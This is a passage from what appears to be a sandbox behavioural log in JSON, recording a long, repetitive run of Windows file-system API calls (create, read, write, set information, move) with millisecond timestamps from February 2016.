17:42:06,758", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,768", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,778", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,778", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,778", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,778", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,788", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,788", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,798", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,808", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,808", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,818", "api": "NtReadFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:06,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,828", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,838", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,838", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,838", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,838", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,848", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,848", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:06,848", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,858", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,858", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,868", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,868", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", 
"api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,878", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,878", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,888", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,888", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,898", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:42:06,898", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,908", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,908", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,918", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,918", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtReadFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,928", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,928", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,938", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,938", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:42:06,948", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,948", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,958", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,958", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,968", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,968", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,978", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:06,978", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,978", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,988", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,988", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:06,998", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:06,998", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,008", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,008", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,008", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,008", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,008", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,008", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,019", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,019", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,029", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,029", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,039", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,049", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,049", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,059", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,059", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,059", "api": "NtCreateFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:42:07,059", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,059", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,059", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,069", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,069", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,079", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,079", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "NtSetInformationFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:42:07,089", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,089", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,089", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,099", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,099", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,109", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,109", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:42:07,119", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,119", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,119", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,119", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,119", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,129", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,129", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,139", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,139", "api": 
"NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,149", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,149", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,159", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,159", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,179", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": 
"NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,179", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,189", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,189", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:42:07,199", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:42:07,199", "api": "NtReadFile"}, {"category": "filesystem", 